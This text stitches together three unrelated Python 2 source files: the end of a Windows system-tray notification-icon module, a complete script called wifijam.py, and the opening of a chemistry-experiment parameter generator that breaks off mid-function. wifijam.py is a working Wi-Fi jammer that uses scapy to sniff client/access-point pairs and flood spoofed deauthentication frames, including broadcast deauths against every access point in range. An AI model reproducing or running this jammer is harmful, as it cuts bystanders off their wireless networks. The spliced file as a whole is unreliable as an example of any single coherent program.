                ("lpszMenuName", ctypes.wintypes.LPCWSTR),
                ("lpszClassName", ctypes.wintypes.LPCWSTR),
                ("hIconSm", ctypes.wintypes.HANDLE)]
ShowWindow = ctypes.windll.user32.ShowWindow
ShowWindow.argtypes = [ctypes.wintypes.HWND, ctypes.c_int]
def GenerateDummyWindow(callback, uid):
    """Register a window class wrapping *callback* and create an invisible
    popup window for it; returns the window handle (HWND)."""
    newclass = WNDCLASSEX()
    newclass.lpfnWndProc = callback
    newclass.lpszClassName = uid.replace("-", "")  # derive a valid class name from the uuid
    # NOTE(review): the returned ATOM is unused and registration failure is
    # not checked -- CreateWindowExW would then simply return 0.
    ATOM = ctypes.windll.user32.RegisterClassExW(ctypes.byref(newclass))
    hwnd = ctypes.windll.user32.CreateWindowExW(0, newclass.lpszClassName, None, WS_POPUP, 0, 0, 0, 0, 0, 0, 0, 0)
    return hwnd
# Message loop calls
TIMERCALLBACK = ctypes.WINFUNCTYPE(None,
ctypes.wintypes.HWND,
ctypes.wintypes.UINT,
ctypes.POINTER(ctypes.wintypes.UINT),
ctypes.wintypes.DWORD)
SetTimer = ctypes.windll.user32.SetTimer
SetTimer.restype = ctypes.POINTER(ctypes.wintypes.UINT)
SetTimer.argtypes = [ctypes.wintypes.HWND,
ctypes.POINTER(ctypes.wintypes.UINT),
ctypes.wintypes.UINT,
TIMERCALLBACK]
KillTimer = ctypes.windll.user32.KillTimer
KillTimer.restype = ctypes.wintypes.BOOL
KillTimer.argtypes = [ctypes.wintypes.HWND,
ctypes.POINTER(ctypes.wintypes.UINT)]
class MSG(ctypes.Structure):
    # Win32 MSG structure filled by GetMessage and fed to DispatchMessage.
    _fields_ = [('HWND', ctypes.wintypes.HWND),
                ('message', ctypes.wintypes.UINT),
                ('wParam', ctypes.wintypes.WPARAM),
                ('lParam', ctypes.wintypes.LPARAM),
                ('time', ctypes.wintypes.DWORD),
                ('pt', POINT)]
GetMessage = ctypes.windll.user32.GetMessageW
GetMessage.restype = ctypes.wintypes.BOOL
GetMessage.argtypes = [ctypes.POINTER(MSG), ctypes.wintypes.HWND, ctypes.wintypes.UINT, ctypes.wintypes.UINT]
TranslateMessage = ctypes.windll.user32.TranslateMessage
TranslateMessage.restype = ctypes.wintypes.ULONG
TranslateMessage.argtypes = [ctypes.POINTER(MSG)]
DispatchMessage = ctypes.windll.user32.DispatchMessageW
DispatchMessage.restype = ctypes.wintypes.ULONG
DispatchMessage.argtypes = [ctypes.POINTER(MSG)]
def LoadIcon(iconfilename, small=False):
    """Load an .ico file from disk and return an HICON.

    When *small* is true a 16x16 icon is requested; otherwise the image's
    default size is used.  (`unicode` is the Python 2 builtin.)"""
    return LoadImage(0,
                     unicode(iconfilename),
                     IMAGE_ICON,
                     16 if small else 0,
                     16 if small else 0,
                     LR_LOADFROMFILE)
class NotificationIcon(object):
def __init__(self, iconfilename, tooltip=None):
assert os.path.isfile(unicode(iconfilename)), "{} doesn't exist".format(iconfilename)
self._iconfile = unicode(iconfilename)
self._hicon = LoadIcon(self._iconfile, True)
assert self._hicon, "Failed to load {}".format(iconfilename)
#self._pumpqueue = Queue.Queue()
self._die = False
self._timerid = None
self._uid = uuid.uuid4()
self._tooltip = unicode(tooltip) if tooltip else u''
#self._thread = threading.Thread(target=self._run)
#self._thread.start()
self._info_bubble = None
self.items = []
def _bubble(self, iconinfo):
if self._info_bubble:
info_bubble = self._info_bubble
self._info_bubble = None
message = unicode(self._info_bubble)
iconinfo.uFlags |= NIF_INFO
iconinfo.szInfo = message
iconinfo.szInfoTitle = message
iconinfo.dwInfoFlags = NIIF_INFO
iconinfo.union.uTimeout = 10000
Shell_NotifyIcon(NIM_MODIFY, ctypes.pointer(iconinfo))
def _run(self):
self.WM_TASKBARCREATED = ctypes.windll.user32.RegisterWindowMessageW(u'TaskbarCreated')
self._windowproc = WNDPROC(self._callback)
self._hwnd = GenerateDummyWindow(self._windowproc, str(self._uid))
iconinfo = NOTIFYICONDATA()
iconinfo.hWnd = self._hwnd
iconinfo.uID = 100
iconinfo.uFlags = NIF_ICON | NIF_SHOWTIP | NIF_MESSAGE | (NIF_TIP if self._tooltip else 0)
iconinfo.uCallbackMessage = WM_MENUCOMMAND
iconinfo.hIcon = self._hicon
iconinfo.szTip = self._tooltip
Shell_NotifyIcon(NIM_ADD, ctypes.pointer(iconinfo))
self.iconinfo = iconinfo
PostMessage(self._hwnd, WM_NULL, 0, 0)
message = MSG()
last_time = -1
ret = None
while not self._die:
try:
ret = GetMessage(ctypes.pointer(message), 0, 0, 0)
TranslateMessage(ctypes.pointer(message))
DispatchMessage(ctypes.pointer(message))
except Exception, err:
# print "NotificationIcon error", err, message
message = MSG()
time.sleep(0.125)
print "Icon thread stopped, removing icon..."
Shell_NotifyIcon(NIM_DELETE, ctypes.cast(ctypes.pointer(iconinfo), ctypes.POINTER(NOTIFYICONDATA)))
ctypes.windll.user32.DestroyWindow(self._hwnd)
ctypes.windll.user32.DestroyIcon(self._hicon)
def _menu(self):
if not hasattr(self, 'items'):
return
menu = CreatePopupMenu()
func = None
try:
iidx = 1000
defaultitem = -1
item_map = {}
for fs in self.items:
iidx += 1
if isinstance(fs, basestring):
if fs and not fs.strip('-_='):
AppendMenu(menu, MF_SEPARATOR, iidx, fs)
else:
AppendMenu(menu, MF_STRING | MF_GRAYED, iidx, fs)
elif isinstance(fs, tuple):
if callable(fs[0]):
itemstring = fs[0]()
else:
itemstring = unicode(fs[0])
flags = MF_STRING
if itemstring.startswith("!"):
itemstring = itemstring[1:]
defaultitem = iidx
if itemstring.startswith("+"):
itemstring = itemstring[1:]
flags = flags | MF_CHECKED
itemcallable = fs[1]
item_map[iidx] = itemcallable
if itemcallable is False:
flags = flags | MF_DISABLED
elif not callable(itemcallable):
flags = flags | MF_GRAYED
AppendMenu(menu, flags, iidx, itemstring)
if defaultitem != -1:
SetMenuDefaultItem(menu, defaultitem, 0)
pos = POINT()
GetCursorPos(ctypes.pointer(pos))
PostMessage(self._hwnd, WM_NULL, 0, 0)
SetForegroundWindow(self._hwnd)
ti = TrackPopupMenu(menu, TPM_RIGHTBUTTON | TPM_RETURNCMD | TPM_NONOTIFY, pos.x, pos.y, 0, self._hwnd, None)
if ti in item_map:
func = item_map[ti]
PostMessage(self._hwnd, WM_NULL, 0, 0)
finally:
DestroyMenu(menu)
if func: func()
def clicked(self):
self._menu()
def _callback(self, hWnd, msg, wParam, lParam):
# Check if the main thread is still alive
if msg == WM_TIMER:
if not any(thread.getName() == 'MainThread' and thread.isAlive()
for thread in threading.enumerate()):
self._die = True
elif msg == WM_MENUCOMMAND and lParam == WM_LBUTTONUP:
self.clicked()
elif msg == WM_MENUCOMMAND and lParam == WM_RBUTTONUP:
self._menu()
elif msg == self.WM_TASKBARCREATED: # Explorer restarted, add the icon again.
Shell_NotifyIcon(NIM_ADD, ctypes.pointer(self.iconinfo))
else:
return DefWindowProc(hWnd, msg, wParam, lParam)
return 1
def die(self):
self._die = True
PostMessage(self._hwnd, WM_NULL, 0, 0)
time.sleep(0.2)
try:
Shell_NotifyIcon(NIM_DELETE, self.iconinfo)
except Exception, err:
print "Icon remove error", err
ctypes.windll.user32.DestroyWindow(self._hwnd)
ctypes.windll.user32.DestroyIcon(self._hicon)
def pump(self):
try:
while not self._pumpqueue.empty():
callable = self._pumpqueue.get(False)
callable()
except Queue.Empty:
pass
def announce(self, text):
self._info_bubble = text
def hideConsole():
    """Hide the current process's console window (Windows only)."""
    console_hwnd = ctypes.windll.kernel32.GetConsoleWindow()
    ctypes.windll.user32.ShowWindow(console_hwnd, 0)  # 0 == SW_HIDE
def showConsole():
    """Show the current process's console window (Windows only)."""
    console_hwnd = ctypes.windll.kernel32.GetConsoleWindow()
    ctypes.windll.user32.ShowWindow(console_hwnd, 1)  # 1 == SW_SHOWNORMAL
# Manual smoke test: build a tray icon with a demo menu and run its
# message loop on the main thread (Windows only, Python 2).
if __name__ == "__main__":
    import time  # NOTE(review): redundant -- time is already imported above

    def greet():
        # Hide the console, then print (visible once the console is shown again).
        ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
        print "Hello"

    def quit():  # shadows the builtin `quit`; harmless in this demo scope
        ni._die = True

    def announce():
        ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 1)
        ni.announce("Hello there")

    def clicked():
        ni.announce("Hello")

    def dynamicTitle():
        # '!' prefix marks the default (bold) menu entry.
        return "!The time is: %s" % time.time()

    ni = NotificationIcon(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../trayicon.ico'), "ZeroNet 0.2.9")
    ni.items = [
        (dynamicTitle, False),
        ('Hello', greet),
        ('Title', False),
        ('!Default', greet),
        ('+Popup bubble', announce),
        'Nothing',
        '--',
        ('Quit', quit)
    ]
    ni.clicked = clicked
    import atexit

    @atexit.register
    def goodbye():
        print "You are now leaving the Python sector."

    ni._run()
wifijam.py | #!/usr/bin/env python
# -*- UTF-8 -*-
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
conf.verb = 0
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
    """Build and parse the command-line arguments for the deauth tool.

    (Help-string alignment below is cosmetic: argparse's HelpFormatter
    re-wraps whitespace when rendering --help.)"""
    #Create the arguments
    parser = argparse.ArgumentParser()
    parser.add_argument("-s",
                        "--skip",
                        nargs='*',
                        default=[],
                        help="Skip deauthing this MAC address. \
                        Example: -s 00:11:BB:33:44:AA")
    parser.add_argument("-i",
                        "--interface",
                        help="Choose monitor mode interface. \
                        By default script will find the most powerful \
                        interface and starts monitor mode on it. \
                        Example: -i mon5")
    parser.add_argument("-c",
                        "--channel",
                        help="Listen on and deauth only clients on the specified channel. \
                        Example: -c 6")
    parser.add_argument("-m",
                        "--maximum",
                        help="Choose the maximum number of clients to deauth. \
                        List of clients will be emptied and repopulated \
                        after hitting the limit. \
                        Example: -m 5")
    parser.add_argument("-n",
                        "--noupdate",
                        help="Do not clear the deauth list when the maximum (-m) \
                        number of client/AP combos is reached. \
                        Must be used in conjunction with -m. \
                        Example: -m 10 -n",
                        action='store_true')
    parser.add_argument("-t",
                        "--timeinterval",
                        help="Choose the time interval between packets being sent. \
                        Default is as fast as possible. \
                        If you see scapy errors like 'no buffer space' \
                        try: -t .00001")
    parser.add_argument("-p",
                        "--packets",
                        help="Choose the number of packets to send in each deauth burst. \
                        Default value is 1; \
                        1 packet to the client and 1 packet to the AP. \
                        Send 2 deauth packets to the client \
                        and 2 deauth packets to the AP: -p 2")
    parser.add_argument("-d",
                        "--directedonly",
                        help="Skip the deauthentication packets to the broadcast \
                        address of the access points and only send them \
                        to client/AP pairs",
                        action='store_true')
    parser.add_argument("-a",
                        "--accesspoint",
                        nargs='*',
                        default=[],
                        help="Enter the SSID or MAC address of a specific access point to target")
    parser.add_argument("--world",
                        help="N. American standard is 11 channels but the rest \
                        of the world it's 13 so this options enables the \
                        scanning of 13 channels",
                        action="store_true")
    return parser.parse_args()
#########################################
# Begin interface info and manipulation #
#########################################
def get_mon_iface(args):
    """Return the monitor-mode interface to use.

    Preference: the -i argument, then an interface already in monitor
    mode, else the 'most powerful' wireless interface switched into
    monitor mode.  Sets the global `monitor_on` when no change was made
    (so `stop()` knows not to tear it down)."""
    global monitor_on
    monitors, interfaces = iwconfig()
    if args.interface:
        monitor_on = True
        return args.interface
    if len(monitors) > 0:
        monitor_on = True
        return monitors[0]
    else:
        # Start monitor mode on a wireless interface
        print '['+G+'*'+W+'] Finding the most powerful interface...'
        interface = get_iface(interfaces)
        mon_mode = start_mon_mode(interface)
        return mon_mode
def iwconfig():
    """Parse `iwconfig` output.

    Returns (monitors, interfaces): interface names already in monitor
    mode, and a dict mapping other wireless interfaces to 1 if currently
    associated (ESSID present) else 0."""
    monitors = []
    interfaces = {}
    try:
        # DN is the module-level /dev/null handle opened in __main__.
        proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
    except OSError:
        sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
    for line in proc.communicate()[0].split('\n'):
        if len(line) == 0: continue  # skip empty lines
        if line[0] != ' ':  # interface header lines start at column 0
            # `re` comes in via scapy.all's wildcard import.
            wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
            if not wired_search:  # Not wired
                iface = line[:line.find(' ')]  # interface name token
                if 'Mode:Monitor' in line:
                    monitors.append(iface)
                elif 'IEEE 802.11' in line:
                    if "ESSID:\"" in line:
                        interfaces[iface] = 1
                    else:
                        interfaces[iface] = 0
    return monitors, interfaces
def get_iface(interfaces):
    """Pick the wireless interface that sees the most APs in an iwlist scan.

    Exits when no wireless interface exists; returns immediately when
    there is only one."""
    scanned_aps = []
    if len(interfaces) < 1:
        sys.exit('['+R+'-'+W+'] No wireless interfaces found, try again')
    if len(interfaces) == 1:
        for interface in interfaces:
            return interface
    # Find most powerful interface
    for iface in interfaces:
        count = 0
        proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
        for line in proc.communicate()[0].split('\n'):
            if ' - Address:' in line:  # first line in iwlist scan for a new AP
                count += 1
        scanned_aps.append((count, iface))
        print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
    try:
        # Tuples compare by AP count first, so max() picks the busiest scan.
        interface = max(scanned_aps)[1]
        return interface
    except Exception as e:
        # Fall back to an arbitrary interface if the scan data was unusable.
        for iface in interfaces:
            interface = iface
        print '['+R+'-'+W+'] Minor error:', e
        print '    Starting monitor mode ON '+G+interface+W
        return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode OFF '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
    """Return *mon_iface* to managed mode and bring it back up."""
    for command in ('ifconfig %s down',
                    'iwconfig %s mode managed',
                    'ifconfig %s up'):
        os.system(command % mon_iface)
def mon_mac(mon_iface):
    """Return the MAC address of *mon_iface* (lowercase, colon-separated)."""
    #http://stackoverflow.com/questions/159137/getting-mac-address
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # 0x8927 == SIOCGIFHWADDR; the hardware address lives at bytes 18..23.
    info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
    mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
    print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
    return mac
##########################################
# End of interface info and manipulation #
##########################################
def channel_hop(mon_iface, args):
    '''
    First time it runs through the channels it stays on each channel for 5 seconds
    in order to populate the deauth list nicely. Afterwards, it's full blast.

    (NOTE(review): the code below actually sleeps 1 second per channel on
    the first pass -- confirm which value is intended.)
    '''
    global mon_channel, first_pass
    channelNum = 0
    maxChan = 11 if not args.world else 13  # 13 channels outside N. America
    err = None
    while 1:
        if args.channel:
            # Pinned channel (-c): never hop.
            with lock:
                mon_channel = args.channel
        else:
            channelNum += 1
            if channelNum > maxChan:
                channelNum = 1
                with lock:
                    first_pass = 0  # first full sweep finished; start deauthing
            with lock:
                mon_channel = str(channelNum)
        try:
            proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', mon_channel], stdout=DN, stderr=PIPE)
        except OSError:
            print '['+R+'-'+W+'] Could not execute "iw"'
            os.kill(os.getpid(), SIGINT)
            sys.exit(1)
        for line in proc.communicate()[1].split('\n'):
            if len(line) > 2:  # iw dev shouldnt display output unless there's an error
                err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
        output(err, mon_channel)
        if args.channel:
            time.sleep(.05)
        else:
            # For the first channel hop thru, do not deauth
            if first_pass == 1:
                time.sleep(1)
                continue
            deauth(mon_channel)
def deauth(mon_channel):
    '''
    addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
    multi-APs to one gateway. Constantly scans the clients_APs list and
    starts a thread to deauth each instance
    '''
    pkts = []
    if len(clients_APs) > 0:
        with lock:
            for x in clients_APs:
                client = x[0]
                ap = x[1]
                ch = x[2]
                # Can't add a RadioTap() layer as the first layer or it's a malformed
                # Association request packet?
                # Append the packets to a new list so we don't have to hog the lock
                # type=0, subtype=12?
                if ch == mon_channel:
                    # Deauth both directions: AP -> client and client -> AP.
                    deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
                    deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
                    pkts.append(deauth_pkt1)
                    pkts.append(deauth_pkt2)
    if len(APs) > 0:
        if not args.directedonly:
            with lock:
                for a in APs:
                    ap = a[0]
                    ch = a[1]
                    if ch == mon_channel:
                        # Broadcast deauth "from" the AP itself.
                        deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
                        pkts.append(deauth_ap)
    if len(pkts) > 0:
        # prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
        if not args.timeinterval:
            args.timeinterval = 0
        if not args.packets:
            args.packets = 1
        for p in pkts:
            send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, mon_channel):
    """Clear the screen and print the current channel, the client/AP
    deauth list, and the AP list (column alignment is cosmetic)."""
    os.system('clear')
    if err:
        print err
    else:
        print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+mon_channel+W+'\n'
    if len(clients_APs) > 0:
        print '                  Deauthing                 ch   ESSID'
        # Print the deauth list
        with lock:
            for ca in clients_APs:
                if len(ca) > 3:
                    # Entry with a resolved ESSID (added by AP_check).
                    print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
                else:
                    print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
    if len(APs) > 0:
        print '\n      Access Points     ch   ESSID'
        with lock:
            for ap in APs:
                print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
    print ''
def noise_filter(skip, addr1, addr2):
    """Return True when either address matches a known-noise address or
    prefix (broadcast, multicast, spanning tree, our own monitor MAC) or
    a user-skipped MAC; return False otherwise.

    Note: currently unused -- the call site in cb() is commented out.
    """
    # Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
    ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
    if skip:
        ignore += [addr.lower() for addr in skip]
    for i in ignore:
        # Substring match so the multicast entries act as prefixes.
        if i in addr1 or i in addr2:
            return True
    # Fix: explicit False (the original fell off the end and returned None).
    return False
def cb(pkt):
    '''
    Look for dot11 packets that aren't to or from broadcast address,
    are type 1 or 2 (control, data), and append the addr1 and addr2
    to the list of deauth targets.
    '''
    global clients_APs, APs
    # return these if's keeping clients_APs the same or just reset clients_APs?
    # I like the idea of the tool repopulating the variable more
    if args.maximum:
        if args.noupdate:
            # -n: freeze the list once the cap is hit.
            if len(clients_APs) > int(args.maximum):
                return
        else:
            # Default: empty and repopulate once the cap is hit.
            if len(clients_APs) > int(args.maximum):
                with lock:
                    clients_APs = []
                    APs = []
    # We're adding the AP and channel to the deauth list at time of creation rather
    # than updating on the fly in order to avoid costly for loops that require a lock
    if pkt.haslayer(Dot11):
        if pkt.addr1 and pkt.addr2:
            # Normalize MACs to lowercase for all comparisons below.
            pkt.addr1 = pkt.addr1.lower()
            pkt.addr2 = pkt.addr2.lower()
            # Filter out all other APs and clients if asked
            if args.accesspoint:
                # track bssid for essid
                if (pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp)) and pkt[Dot11Elt].info in args.accesspoint:
                    args.accesspoint.add(pkt[Dot11].addr3.lower())
                # bail if bssid is not in target list
                if not args.accesspoint.intersection([pkt.addr1.lower(), pkt.addr2.lower()]):
                    # pkt does not match our target list
                    return
            if args.skip:
                if pkt.addr2 in args.skip:
                    return
            # Check if it's added to our AP list
            if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
                APs_add(clients_APs, APs, pkt, args.channel, args.world)
            # Ignore all the noisy packets like spanning tree
            #if noise_filter(skip, pkt.addr1, pkt.addr2):
            #    return
            # Control = 1, data = 2 (802.11 type 0 is management; the
            # original comment here said "Management = 1", which was wrong).
            if pkt.type in [1, 2]:
                clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
    '''
    Record a newly seen access point in the shared APs list as
    [bssid, channel, essid], deduplicating on BSSID.  Frames on channels
    outside the allowed range (1-11, or 1-13 when world_arg is set) or
    not matching a requested channel filter are ignored.
    '''
    ssid = pkt[Dot11Elt].info
    bssid = pkt[Dot11].addr3.lower()
    try:
        # Thanks to airoscapy for below
        ap_channel = str(ord(pkt[Dot11Elt:3].info))
        # Fix: honor the world_arg parameter (the caller passes args.world here)
        # instead of reaching back into the global args object.
        chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not world_arg else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
        if ap_channel not in chans:
            return
        if chan_arg:
            if ap_channel != chan_arg:
                return
    except Exception as e:
        # Malformed/truncated information element: skip this frame.
        return
    if len(APs) == 0:
        with lock:
            return APs.append([bssid, ap_channel, ssid])
    else:
        # dedupe on BSSID before appending
        for b in APs:
            if bssid in b[0]:
                return
        with lock:
            return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
    '''
    Record a client/AP address pair in the shared clients_APs list,
    deduplicating on the (addr1, addr2) pair.  When known APs exist,
    AP_check attaches the AP's channel/ESSID; otherwise the current
    monitor channel is recorded.
    '''
    if len(clients_APs) == 0:
        if len(APs) == 0:
            with lock:
                return clients_APs.append([addr1, addr2, mon_channel])
        else:
            AP_check(addr1, addr2)
    # Append new clients/APs if they're not in the list
    else:
        for ca in clients_APs:
            if addr1 in ca and addr2 in ca:
                return
        if len(APs) > 0:
            return AP_check(addr1, addr2)
        else:
            with lock:
                return clients_APs.append([addr1, addr2, mon_channel])
def AP_check(addr1, addr2):
    """If either address belongs to a known AP, record the pair in the
    shared clients_APs list together with the AP's channel and ESSID."""
    a1, a2 = addr1.lower(), addr2.lower()
    for entry in APs:
        bssid = entry[0].lower()
        if bssid in a1 or bssid in a2:
            with lock:
                return clients_APs.append([addr1, addr2, entry[1], entry[2]])
def stop(signal, frame):
    # SIGINT handler (registered via signal(SIGINT, stop) in __main__):
    # tear down the monitor interface if we created it, then exit.
    if monitor_on:
        # interface was already in monitor mode before we started; leave it be
        sys.exit('\n['+R+'!'+W+'] Closing')
    else:
        remove_mon_iface(mon_iface)
        os.system('service network-manager restart')
        sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
    # Requires root: raw 802.11 sniffing and interface manipulation.
    if os.geteuid():
        sys.exit('['+R+'-'+W+'] Run as root')
    # Shared state mutated by the sniffer callback and channel-hop thread.
    clients_APs = []
    APs = []
    DN = open(os.devnull, 'w')
    lock = Lock()
    args = parse_args()
    args.skip = list(map(str.lower, args.skip))
    # lowercase bssids while leaving essids intact
    args.accesspoint = set(_.lower() if ':' in _ else _ for _ in args.accesspoint)
    monitor_on = None
    mon_iface = get_mon_iface(args)
    conf.iface = mon_iface
    mon_MAC = mon_mac(mon_iface)
    first_pass = 1
    # Start channel hopping
    hop = Thread(target=channel_hop, args=(mon_iface, args))
    hop.daemon = True
    hop.start()
    # Install SIGINT handler so Ctrl-C restores the interface.
    signal(SIGINT, stop)
    try:
        # store=0: don't keep packets in memory; cb handles each frame.
        sniff(iface=mon_iface, store=0, prn=cb)
    except Exception as msg:
        # Best-effort cleanup on any sniffer failure before exiting.
        remove_mon_iface(mon_iface)
        os.system('service network-manager restart')
        print '\n['+R+'!'+W+'] Closing'
sys.exit(0) |
param_generator.py | #!/usr/bin/env python
__author__ = 'Florian Hase'
#========================================================================
import copy
import numpy as np
from threading import Thread
from DatabaseManager.database import Database
from Utilities.misc import Printer
#========================================================================
#========================================================================
class ParamGenerator(Printer):
    """Proposes experiment parameters via a pluggable optimization backend.

    Generated parameters are written to a parameter database; a consumer
    (ChemOS) picks them up from there.  Training runs on a background
    thread per experiment, guarded by the BUSY flags.
    """
    # per-experiment flag: True while a generation thread is running
    BUSY = {}
    # schema of the parameter database table
    DB_ATTRIBUTES = {'exp_identifier': 'string',
                     'status': 'integer',
                     'parameters': 'pickle',
                     'sampling_parameter_value': 'integer'}
    OPTIMIZER = None
    # per-experiment status: 'usable' or 'trash' (set by kill_running_instances)
    PARAM_STATUS = {}
    # per-experiment observations consumed by _parameter_generation
    TARGET_SPECS = {}
    # add generated parameters as attributes to the parameter generator with a unique attribute name
    # then, have chemOS pick up the generated parameters and dump them in the respective database
    # make sure, to always properly destroy the attributes after they have been dumped
    def __init__(self, settings, verbose = True):
        """Select the optimization backend named in settings['algorithm'] and
        open the parameter database.  Raises NotImplementedError for an
        unknown algorithm name."""
        Printer.__init__(self, 'PARAMETER GENERATOR')
        self.settings = settings
        self.verbose = verbose
        self.settings['algorithm']['scratch_dir'] = self.settings['scratch_dir']
        # importing the wrappers here allows to use one optimimization algorithm
        # without having installed the others
        if self.settings['algorithm']['name'] == 'phoenics':
            from ParamGenerator.Phoenics.phoenics_wrapper import PhoenicsWrapper
            self.optimization_algorithm = PhoenicsWrapper(self.settings['algorithm'])
        elif self.settings['algorithm']['name'] == 'smac':
            from ParamGenerator.SMAC.smac_wrapper import SmacWrapper
            self.optimization_algorithm = SmacWrapper(self.settings['algorithm'])
        elif self.settings['algorithm']['name'] == 'spearmint':
            from ParamGenerator.Spearmint.spearmint_wrapper import SpearmintWrapper
            self.optimization_algorithm = SpearmintWrapper(self.settings['algorithm'])
        elif self.settings['algorithm']['name'] == 'random_search':
            from ParamGenerator.RandomSearch.random_search_wrapper import RandomsearchWrapper
            self.optimization_algorithm = RandomsearchWrapper(self.settings['algorithm'])
        else:
            raise NotImplementedError
        self.BUSY = {experiment['name']: False for experiment in self.settings['experiments']}
        self.number_proposed_parameters = {experiment['name']: 0 for experiment in self.settings['experiments']}
        self._create_database()
        self.number_proposed_recipes = {}
    def _create_database(self):
        """Open the parameter database described in settings['param_database']."""
        db_settings = self.settings['param_database']
        self.database = Database(db_settings['path'], self.DB_ATTRIBUTES,
                                 db_settings['database_type'], verbose = self.verbose)
    def _get_experiment(self, identifier):
        """Return the experiment dict whose 'name' equals identifier.
        NOTE(review): if no name matches, the last experiment is returned
        (loop falls through without break) -- confirm identifiers are
        always valid."""
        for experiment in self.settings['experiments']:
            if experiment['name'] == identifier:
                break
        return experiment
    def _get_random_parameters(self, identifier):
        """Draw one parameter set from a fresh optimizer instance (no
        observations) and rescale it to the experiment's variable ranges."""
        # get experiment settings
        experiment = self._get_experiment(identifier)
        # with self.optimization_algorithm.get_instance(identifier, experiment) as optimizer:
        optimizer = self.optimization_algorithm.get_instance(identifier, experiment)
        # with self.optimization_algorithm(identifier, experiment) as optimizer:
        normalized_parameter = optimizer.choose()
        del optimizer
        parameter = self._rescale_parameters(normalized_parameter, identifier)
        # we need to rescale the
        return parameter
    def _get_sampling_parameter(self, identifier):
        """Return the sampling slot (proposal count modulo batch_size) for
        this experiment, initializing the counter on first use."""
        if not identifier in self.number_proposed_parameters.keys():
            self.number_proposed_parameters[identifier] = 0
        return self.number_proposed_parameters[identifier] % self.settings['algorithm']['batch_size']
    def select_parameters(self, identifier):
        """Fetch the next unused parameter set from the database, or fall
        back to a random draw.

        Returns (parameter, wait, retrain): `retrain` is True when the
        database had no usable entry; `wait` is True when a generation
        thread for this experiment is already running.
        """
        sampling_parameter = self._get_sampling_parameter(identifier)
        condition = {'exp_identifier': identifier, 'sampling_parameter_value': sampling_parameter, 'status': 0}
        target = 'parameters'
        parameter = self.database.fetch(condition, target)
        # check if we got parameters from the database
        retrain = False
        if type(parameter).__name__ != 'ndarray':
            # we did not get a valid set of parameters, so we need to generate a random parameter set
            parameter = self._get_random_parameters(identifier)
            retrain = True
        else:
            # update the status
            update = {'status': 1}
            self.database.update(condition, update)
        wait = retrain and self.BUSY[identifier]
        parameter = np.squeeze(parameter)
        if not wait:
            self.number_proposed_parameters[identifier] += 1
        return parameter, wait, retrain
    def remove_parameters(self, identifier):
        """Delete all database entries belonging to this experiment."""
        condition = {'exp_identifier': identifier}
        self.database.remove_all(condition)
    def _normalize_observations(self, observations, exp_identifier):
        """Map each observed variable sample into [0, 1] via linear scaling
        with the experiment's declared low/high bounds."""
        # get experiment
        experiment = self._get_experiment(exp_identifier)
        var_names = [variable['name'] for variable in experiment['variables']]
        var_lows = [variable['low'] for variable in experiment['variables']]
        var_highs = [variable['high'] for variable in experiment['variables']]
        rescaled_observations = []
        for observation in observations:
            rescaled_observation = copy.deepcopy(observation)
            for var_index, var_name in enumerate(var_names):
                value = rescaled_observation[var_name]['samples']
                # FIXME: for now, only linear rescaling
                rescaled_observation[var_name]['samples'] = (value - var_lows[var_index]) / (var_highs[var_index] - var_lows[var_index])
            rescaled_observations.append(rescaled_observation)
        return rescaled_observations
    def _rescale_parameters(self, normalized_parameters, exp_identifier):
